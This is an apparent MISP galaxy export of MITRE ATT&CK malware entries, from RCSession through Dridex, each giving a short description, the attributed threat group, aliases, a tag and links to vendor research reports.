[RCSession](https://attack.mitre.org/software/S0662) is a backdoor written in C++ that has been in use since at least 2018 by [Mustang Panda](https://attack.mitre.org/groups/G0129) and by [Threat Group-3390](https://attack.mitre.org/groups/G0027) (Type II Backdoor).(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro Iron Tiger April 2021)(Citation: Trend Micro DRBControl February 2020)

The tag is: misp-galaxy:mitre-malware="RCSession - S0662"

RCSession - S0662 is also known as:

  • RCSession

Table 7659. Table References

Links

https://attack.mitre.org/software/S0662

https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf

https://www.secureworks.com/research/bronze-president-targets-ngos

https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

FELIXROOT - S0267

[FELIXROOT](https://attack.mitre.org/software/S0267) is a backdoor that has been used to target Ukrainian victims. (Citation: FireEye FELIXROOT July 2018)

The tag is: misp-galaxy:mitre-malware="FELIXROOT - S0267"

FELIXROOT - S0267 is also known as:

  • FELIXROOT

  • GreyEnergy mini

Table 7660. Table References

Links

https://attack.mitre.org/software/S0267

https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html

https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf

Keydnap - S0276

This piece of malware steals the content of the user’s keychain while maintaining a permanent backdoor (Citation: OSX Keydnap malware).

The tag is: misp-galaxy:mitre-malware="Keydnap - S0276"

Keydnap - S0276 is also known as:

  • Keydnap

  • OSX/Keydnap

Table 7661. Table References

Links

https://attack.mitre.org/software/S0276

https://www.synack.com/2017/01/01/mac-malware-2016/

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

SodaMaster - S0627

[SodaMaster](https://attack.mitre.org/software/S0627) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)

The tag is: misp-galaxy:mitre-malware="SodaMaster - S0627"

SodaMaster - S0627 is also known as:

  • SodaMaster

  • DARKTOWN

  • dfls

  • DelfsCake

Table 7662. Table References

Links

https://attack.mitre.org/software/S0627

https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

Zox - S0672

[Zox](https://attack.mitre.org/software/S0672) is a remote access tool that has been used by [Axiom](https://attack.mitre.org/groups/G0001) since at least 2008.(Citation: Novetta-Axiom)

The tag is: misp-galaxy:mitre-malware="Zox - S0672"

Zox - S0672 is also known as:

  • Zox

  • Gresim

  • ZoxRPC

  • ZoxPNG

Table 7663. Table References

Links

https://attack.mitre.org/software/S0672

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

OBAD - S0286

OBAD is an Android malware family. (Citation: TrendMicro-Obad)

The tag is: misp-galaxy:mitre-malware="OBAD - S0286"

OBAD - S0286 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

Table 7664. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/

https://attack.mitre.org/software/S0286

FYAnti - S0628

[FYAnti](https://attack.mitre.org/software/S0628) is a loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2020, including to deploy [QuasarRAT](https://attack.mitre.org/software/S0262).(Citation: Securelist APT10 March 2021)

The tag is: misp-galaxy:mitre-malware="FYAnti - S0628"

FYAnti - S0628 is also known as:

  • FYAnti

  • DILLJUICE stage2

Table 7665. Table References

Links

https://attack.mitre.org/software/S0628

https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

TrailBlazer - S0682

[TrailBlazer](https://attack.mitre.org/software/S0682) is a modular malware that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2019.(Citation: CrowdStrike StellarParticle January 2022)

The tag is: misp-galaxy:mitre-malware="TrailBlazer - S0682"

TrailBlazer - S0682 is also known as:

  • TrailBlazer

Table 7666. Table References

Links

https://attack.mitre.org/software/S0682

https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/

Bisonal - S0268

[Bisonal](https://attack.mitre.org/software/S0268) is a remote access tool (RAT) that has been used by [Tonto Team](https://attack.mitre.org/groups/G0131) against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020)

The tag is: misp-galaxy:mitre-malware="Bisonal - S0268"

Bisonal - S0268 is also known as:

  • Bisonal

Table 7667. Table References

Links

https://attack.mitre.org/software/S0268

https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html

https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/

QUADAGENT - S0269

[QUADAGENT](https://attack.mitre.org/software/S0269) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: Unit 42 QUADAGENT July 2018)

The tag is: misp-galaxy:mitre-malware="QUADAGENT - S0269"

QUADAGENT - S0269 is also known as:

  • QUADAGENT

Table 7668. Table References

Links

https://attack.mitre.org/software/S0269

https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/

RainyDay - S0629

[RainyDay](https://attack.mitre.org/software/S0629) is a backdoor tool that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)

The tag is: misp-galaxy:mitre-malware="RainyDay - S0629"

RainyDay - S0629 is also known as:

  • RainyDay

Table 7669. Table References

Links

https://attack.mitre.org/software/S0629

https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf

FruitFly - S0277

FruitFly is designed to spy on mac users (Citation: objsee mac malware 2017).

The tag is: misp-galaxy:mitre-malware="FruitFly - S0277"

FruitFly - S0277 is also known as:

  • FruitFly

Table 7670. Table References

Links

https://attack.mitre.org/software/S0277

https://objective-see.com/blog/blog_0x25.html

ZergHelper - S0287

[ZergHelper](https://attack.mitre.org/software/S0287) is iOS riskware that was unique due to its apparent evasion of Apple’s App Store review process. No malicious functionality was identified in the app, but it presents security risks. (Citation: Xiao-ZergHelper)

The tag is: misp-galaxy:mitre-malware="ZergHelper - S0287"

ZergHelper - S0287 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Detect App Analysis Environment - T1440" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

Table 7671. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/

https://attack.mitre.org/software/S0287

iKitten - S0278

[iKitten](https://attack.mitre.org/software/S0278) is a macOS exfiltration agent (Citation: objsee mac malware 2017).

The tag is: misp-galaxy:mitre-malware="iKitten - S0278"

iKitten - S0278 is also known as:

  • iKitten

  • OSX/MacDownloader

Table 7672. Table References

Links

https://attack.mitre.org/software/S0278

https://objective-see.com/blog/blog_0x25.html

XcodeGhost - S0297

[XcodeGhost](https://attack.mitre.org/software/S0297) is iOS malware that infected at least 39 iOS apps in 2015 and potentially affected millions of users. (Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)

The tag is: misp-galaxy:mitre-malware="XcodeGhost - S0297"

XcodeGhost - S0297 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1414" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 7673. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/

http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/

https://attack.mitre.org/software/S0297

Proton - S0279

[Proton](https://attack.mitre.org/software/S0279) is a macOS backdoor focusing on data theft and credential access (Citation: objsee mac malware 2017).

The tag is: misp-galaxy:mitre-malware="Proton - S0279"

Proton - S0279 is also known as:

  • Proton

Table 7674. Table References

Links

https://attack.mitre.org/software/S0279

https://objective-see.com/blog/blog_0x25.html

KeyRaider - S0288

[KeyRaider](https://attack.mitre.org/software/S0288) is malware that steals Apple account credentials and other data from jailbroken iOS devices. It also has ransomware functionality. (Citation: Xiao-KeyRaider)

The tag is: misp-galaxy:mitre-malware="KeyRaider - S0288"

KeyRaider - S0288 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"

Table 7675. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/

https://attack.mitre.org/software/S0288

NotCompatible - S0299

[NotCompatible](https://attack.mitre.org/software/S0299) is an Android malware family that was used between at least 2014 and 2016. It has multiple variants that have become more sophisticated over time. (Citation: Lookout-NotCompatible)

The tag is: misp-galaxy:mitre-malware="NotCompatible - S0299"

NotCompatible - S0299 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1428" with estimative-language:likelihood-probability="almost-certain"

Table 7676. Table References

Links

https://attack.mitre.org/software/S0299

https://blog.lookout.com/blog/2014/11/19/notcompatible/

UBoatRAT - S0333

[UBoatRAT](https://attack.mitre.org/software/S0333) is a remote access tool that was identified in May 2017.(Citation: PaloAlto UBoatRAT Nov 2017)

The tag is: misp-galaxy:mitre-malware="UBoatRAT - S0333"

UBoatRAT - S0333 is also known as:

  • UBoatRAT

Table 7677. Table References

Links

https://attack.mitre.org/software/S0333

https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/

DarkComet - S0334

[DarkComet](https://attack.mitre.org/software/S0334) is a Windows remote administration tool and backdoor.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)

The tag is: misp-galaxy:mitre-malware="DarkComet - S0334"

DarkComet - S0334 is also known as:

  • DarkComet

  • DarkKomet

  • Fynloski

  • Krademok

  • FYNLOS

Table 7678. Table References

Links

https://attack.mitre.org/software/S0334

https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/DARKCOMET

Rifdoor - S0433

[Rifdoor](https://attack.mitre.org/software/S0433) is a remote access trojan (RAT) that shares numerous code similarities with [HotCroissant](https://attack.mitre.org/software/S0431).(Citation: Carbon Black HotCroissant April 2020)

The tag is: misp-galaxy:mitre-malware="Rifdoor - S0433"

Rifdoor - S0433 is also known as:

  • Rifdoor

Table 7679. Table References

Links

https://attack.mitre.org/software/S0433

https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/

SLOTHFULMEDIA - S0533

[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017.(Citation: CISA MAR SLOTHFULMEDIA October 2020)(Citation: Costin Raiu IAmTheKing October 2020) It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.(Citation: USCYBERCOM SLOTHFULMEDIA October 2020)(Citation: Kaspersky IAmTheKing October 2020)

In October 2020, Kaspersky Labs assessed [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is part of an activity cluster it refers to as "IAmTheKing".(Citation: Kaspersky IAmTheKing October 2020) ESET also noted code similarity between [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) and droppers used by a group it refers to as "PowerPool".(Citation: ESET PowerPool Code October 2020)

The tag is: misp-galaxy:mitre-malware="SLOTHFULMEDIA - S0533"

SLOTHFULMEDIA - S0533 is also known as:

  • SLOTHFULMEDIA

  • JackOfHearts

  • QueenOfClubs

Table 7680. Table References

Links

https://attack.mitre.org/software/S0533

https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/

https://twitter.com/CNMF_CyberAlert/status/1311743710997159953

https://twitter.com/ESETresearch/status/1311762215490461696

https://twitter.com/craiu/status/1311920398259367942

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a

Carbon - S0335

[Carbon](https://attack.mitre.org/software/S0335) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. [Carbon](https://attack.mitre.org/software/S0335) has been selectively used by [Turla](https://attack.mitre.org/groups/G0010) to target government and foreign affairs-related organizations in Central Asia.(Citation: ESET Carbon Mar 2017)(Citation: Securelist Turla Oct 2018)

The tag is: misp-galaxy:mitre-malware="Carbon - S0335"

Carbon - S0335 is also known as:

  • Carbon

Table 7681. Table References

Links

https://attack.mitre.org/software/S0335

https://securelist.com/shedding-skin-turlas-fresh-faces/88069/

https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/

NOKKI - S0353

[NOKKI](https://attack.mitre.org/software/S0353) is a modular remote access tool. The earliest observed attack using [NOKKI](https://attack.mitre.org/software/S0353) was in January 2018. [NOKKI](https://attack.mitre.org/software/S0353) has significant code overlap with the [KONNI](https://attack.mitre.org/software/S0356) malware family. There is some evidence potentially linking [NOKKI](https://attack.mitre.org/software/S0353) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)

The tag is: misp-galaxy:mitre-malware="NOKKI - S0353"

NOKKI - S0353 is also known as:

  • NOKKI

Table 7682. Table References

Links

https://attack.mitre.org/software/S0353

https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/

https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/

NanoCore - S0336

[NanoCore](https://attack.mitre.org/software/S0336) is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.(Citation: DigiTrust NanoCore Jan 2017)(Citation: Cofense NanoCore Mar 2018)(Citation: PaloAlto NanoCore Feb 2016)(Citation: Unit 42 Gorgon Group Aug 2018)

The tag is: misp-galaxy:mitre-malware="NanoCore - S0336"

NanoCore - S0336 is also known as:

  • NanoCore

Table 7683. Table References

Links

https://attack.mitre.org/software/S0336

https://cofense.com/nanocore-rat-resurfaced-sewers/

https://researchcenter.paloaltonetworks.com/2016/02/nanocorerat-behind-an-increase-in-tax-themed-phishing-e-mails/

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://www.digitrustgroup.com/nanocore-not-your-average-rat/

Astaroth - S0373

[Astaroth](https://attack.mitre.org/software/S0373) is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. (Citation: Cybereason Astaroth Feb 2019)(Citation: Cofense Astaroth Sept 2018)(Citation: Securelist Brazilian Banking Malware July 2020)

The tag is: misp-galaxy:mitre-malware="Astaroth - S0373"

Astaroth - S0373 is also known as:

  • Astaroth

  • Guildma

Table 7684. Table References

Links

https://attack.mitre.org/software/S0373

https://cofense.com/seeing-resurgence-demonic-astaroth-wmic-trojan/

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research

BadPatch - S0337

[BadPatch](https://attack.mitre.org/software/S0337) is a Windows Trojan that was used in a Gaza Hackers-linked campaign.(Citation: Unit 42 BadPatch Oct 2017)

The tag is: misp-galaxy:mitre-malware="BadPatch - S0337"

BadPatch - S0337 is also known as:

  • BadPatch

Table 7685. Table References

Links

https://attack.mitre.org/software/S0337

https://researchcenter.paloaltonetworks.com/2017/10/unit42-badpatch/

FlawedGrace - S0383

[FlawedGrace](https://attack.mitre.org/software/S0383) is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.(Citation: Proofpoint TA505 Jan 2019)

The tag is: misp-galaxy:mitre-malware="FlawedGrace - S0383"

FlawedGrace - S0383 is also known as:

  • FlawedGrace

Table 7686. Table References

Links

https://attack.mitre.org/software/S0383

https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505

Micropsia - S0339

[Micropsia](https://attack.mitre.org/software/S0339) is a remote access tool written in Delphi.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)

The tag is: misp-galaxy:mitre-malware="Micropsia - S0339"

Micropsia - S0339 is also known as:

  • Micropsia

Table 7687. Table References

Links

https://attack.mitre.org/software/S0339

https://blog.radware.com/security/2018/07/micropsia-malware/

https://blog.talosintelligence.com/2017/06/palestine-delphi.html

PowerStallion - S0393

[PowerStallion](https://attack.mitre.org/software/S0393) is a lightweight [PowerShell](https://attack.mitre.org/techniques/T1059/001) backdoor used by [Turla](https://attack.mitre.org/groups/G0010), possibly as a recovery access tool to install other backdoors.(Citation: ESET Turla PowerShell May 2019)

The tag is: misp-galaxy:mitre-malware="PowerStallion - S0393"

PowerStallion - S0393 is also known as:

  • PowerStallion

Table 7688. Table References

Links

https://attack.mitre.org/software/S0393

https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/

MESSAGETAP - S0443

[MESSAGETAP](https://attack.mitre.org/software/S0443) is a data mining malware family deployed by [APT41](https://attack.mitre.org/groups/G0096) into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. (Citation: FireEye MESSAGETAP October 2019)

The tag is: misp-galaxy:mitre-malware="MESSAGETAP - S0443"

MESSAGETAP - S0443 is also known as:

  • MESSAGETAP

Table 7689. Table References

Links

https://attack.mitre.org/software/S0443

https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html

Azorult - S0344

[Azorult](https://attack.mitre.org/software/S0344) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://attack.mitre.org/software/S0344) has been observed in the wild as early as 2016. In July 2018, [Azorult](https://attack.mitre.org/software/S0344) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://attack.mitre.org/software/S0344) has been seen used for cryptocurrency theft. (Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)

The tag is: misp-galaxy:mitre-malware="Azorult - S0344"

Azorult - S0344 is also known as:

  • Azorult

Table 7690. Table References

Links

https://attack.mitre.org/software/S0344

https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/

https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside

PLEAD - S0435

[PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two. [PLEAD](https://attack.mitre.org/software/S0435) was observed in use as early as March 2017.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018)

The tag is: misp-galaxy:mitre-malware="PLEAD - S0435"

PLEAD - S0435 is also known as:

  • PLEAD

Table 7691. Table References

Links

https://attack.mitre.org/software/S0435

https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/

https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/

https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html

Bazar - S0534

[Bazar](https://attack.mitre.org/software/S0534) is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. [Bazar](https://attack.mitre.org/software/S0534) reportedly has ties to [TrickBot](https://attack.mitre.org/software/S0266) campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.(Citation: Cybereason Bazar July 2020)

The tag is: misp-galaxy:mitre-malware="Bazar - S0534"

Bazar - S0534 is also known as:

  • Bazar

  • KEGTAP

  • Team9

Table 7692. Table References

Links

https://attack.mitre.org/software/S0534

https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

Denis - S0354

[Denis](https://attack.mitre.org/software/S0354) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050). [Denis](https://attack.mitre.org/software/S0354) shares several similarities to the [SOUNDBITE](https://attack.mitre.org/software/S0157) backdoor and has been used in conjunction with the [Goopy](https://attack.mitre.org/software/S0477) backdoor.(Citation: Cybereason Oceanlotus May 2017)

The tag is: misp-galaxy:mitre-malware="Denis - S0354"

Denis - S0354 is also known as:

  • Denis

Table 7693. Table References

Links

https://attack.mitre.org/software/S0354

https://www.cybereason.com/blog/operation-cobalt-kitty-apt

Pony - S0453

[Pony](https://attack.mitre.org/software/S0453) is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.(Citation: Malwarebytes Pony April 2016)

The tag is: misp-galaxy:mitre-malware="Pony - S0453"

Pony - S0453 is also known as:

  • Pony

Table 7694. Table References

Links

https://attack.mitre.org/software/S0453

https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/

Seasalt - S0345

[Seasalt](https://attack.mitre.org/software/S0345) is malware that has been linked to [APT1](https://attack.mitre.org/groups/G0006)'s 2010 operations. It shares some code similarities with [OceanSalt](https://attack.mitre.org/software/S0346).(Citation: Mandiant APT1 Appendix)(Citation: McAfee Oceansalt Oct 2018)

The tag is: misp-galaxy:mitre-malware="Seasalt - S0345"

Seasalt - S0345 is also known as:

  • Seasalt

Table 7695. Table References

Links

https://attack.mitre.org/software/S0345

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf

Spark - S0543

[Spark](https://attack.mitre.org/software/S0543) is a Windows backdoor and has been in use since as early as 2017.(Citation: Unit42 Molerat Mar 2020)

The tag is: misp-galaxy:mitre-malware="Spark - S0543"

Spark - S0543 is also known as:

  • Spark

Table 7696. Table References

Links

https://attack.mitre.org/software/S0543

https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/

INSOMNIA - S0463

[INSOMNIA](https://attack.mitre.org/software/S0463) is spyware that has been used by the group Evil Eye.(Citation: Volexity Insomnia)

The tag is: misp-galaxy:mitre-malware="INSOMNIA - S0463"

INSOMNIA - S0463 is also known as:

  • INSOMNIA

Table 7697. Table References

Links

https://attack.mitre.org/software/S0463

https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/

TSCookie - S0436

[TSCookie](https://attack.mitre.org/software/S0436) is a remote access tool (RAT) that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) in campaigns against Japanese targets.(Citation: JPCert TSCookie March 2018)(Citation: JPCert BlackTech Malware September 2019). [TSCookie](https://attack.mitre.org/software/S0436) has been referred to as [PLEAD](https://attack.mitre.org/software/S0435) though more recent reporting indicates a separation between the two.(Citation: JPCert PLEAD Downloader June 2018)(Citation: JPCert BlackTech Malware September 2019)

The tag is: misp-galaxy:mitre-malware="TSCookie - S0436"

TSCookie - S0436 is also known as:

  • TSCookie

Table 7698. Table References

Links

https://attack.mitre.org/software/S0436

https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html

https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html

EnvyScout - S0634

[EnvyScout](https://attack.mitre.org/software/S0634) is a dropper that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)

The tag is: misp-galaxy:mitre-malware="EnvyScout - S0634"

EnvyScout - S0634 is also known as:

  • EnvyScout

Table 7699. Table References

Links

https://attack.mitre.org/software/S0634

https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

OceanSalt - S0346

[OceanSalt](https://attack.mitre.org/software/S0346) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. [OceanSalt](https://attack.mitre.org/software/S0346) shares code similarity with [SpyNote RAT](https://attack.mitre.org/software/S0305), which has been linked to [APT1](https://attack.mitre.org/groups/G0006).(Citation: McAfee Oceansalt Oct 2018)

The tag is: misp-galaxy:mitre-malware="OceanSalt - S0346"

OceanSalt - S0346 is also known as:

  • OceanSalt

Table 7700. Table References

Links

https://attack.mitre.org/software/S0346

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf

Peppy - S0643

[Peppy](https://attack.mitre.org/software/S0643) is a Python-based remote access Trojan, active since at least 2012, with similarities to [Crimson](https://attack.mitre.org/software/S0115).(Citation: Proofpoint Operation Transparent Tribe March 2016)

The tag is: misp-galaxy:mitre-malware="Peppy - S0643"

Peppy - S0643 is also known as:

  • Peppy

Table 7701. Table References

Links

https://attack.mitre.org/software/S0643

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

AuditCred - S0347

[AuditCred](https://attack.mitre.org/software/S0347) is a malicious DLL that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) during their 2018 attacks.(Citation: TrendMicro Lazarus Nov 2018)

The tag is: misp-galaxy:mitre-malware="AuditCred - S0347"

AuditCred - S0347 is also known as:

  • AuditCred

  • Roptimizer

Table 7702. Table References

Links

https://attack.mitre.org/software/S0347

https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/

Avenger - S0473

[Avenger](https://attack.mitre.org/software/S0473) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-malware="Avenger - S0473"

Avenger - S0473 is also known as:

  • Avenger

Table 7703. Table References

Links

https://attack.mitre.org/software/S0473

https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

Kivars - S0437

[Kivars](https://attack.mitre.org/software/S0437) is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by [BlackTech](https://attack.mitre.org/groups/G0098) in a 2010 campaign.(Citation: TrendMicro BlackTech June 2017)

The tag is: misp-galaxy:mitre-malware="Kivars - S0437"

Kivars - S0437 is also known as:

  • Kivars

Table 7704. Table References

Links

https://attack.mitre.org/software/S0437

https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/

SpeakUp - S0374

[SpeakUp](https://attack.mitre.org/software/S0374) is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. (Citation: CheckPoint SpeakUp Feb 2019)

The tag is: misp-galaxy:mitre-malware="SpeakUp - S0374"

SpeakUp - S0374 is also known as:

  • SpeakUp

Table 7705. Table References

Links

https://attack.mitre.org/software/S0374

https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/

Attor - S0438

[Attor](https://attack.mitre.org/software/S0438) is a Windows-based espionage platform that has been seen in use since 2013. [Attor](https://attack.mitre.org/software/S0438) has a loadable plugin architecture to customize functionality for specific targets.(Citation: ESET Attor Oct 2019)

The tag is: misp-galaxy:mitre-malware="Attor - S0438"

Attor - S0438 is also known as:

  • Attor

Table 7706. Table References

Links

https://attack.mitre.org/software/S0438

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf

IcedID - S0483

[IcedID](https://attack.mitre.org/software/S0483) is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. [IcedID](https://attack.mitre.org/software/S0483) has been downloaded by [Emotet](https://attack.mitre.org/software/S0367) in multiple campaigns.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)

The tag is: misp-galaxy:mitre-malware="IcedID - S0483"

IcedID - S0483 is also known as:

  • IcedID

Table 7707. Table References

Links

https://attack.mitre.org/software/S0483

https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware

https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/

Dridex - S0384

[Dridex](https://attack.mitre.org/software/S0384) is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated [Dridex](https://attack.mitre.org/software/S0384) had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. [Dridex](https://attack.mitre.org/software/S0384) was created from the source code of the Bugat banking Trojan (also known as Cridex).(Citation: Dell Dridex Oct 2015)(Citation: Kaspersky Dridex May 2017)(Citation: Treasury EvilCorp Dec 2019)

The tag is: misp-galaxy:mitre-malware="Dridex - S0384"

Dridex - S0384 is also known as:

  • Dridex

  • Bugat v5

Table 7708. Table References

Links

https://attack.mitre.org/software/S0384

https://home.treasury.gov/news/press-releases/sm845

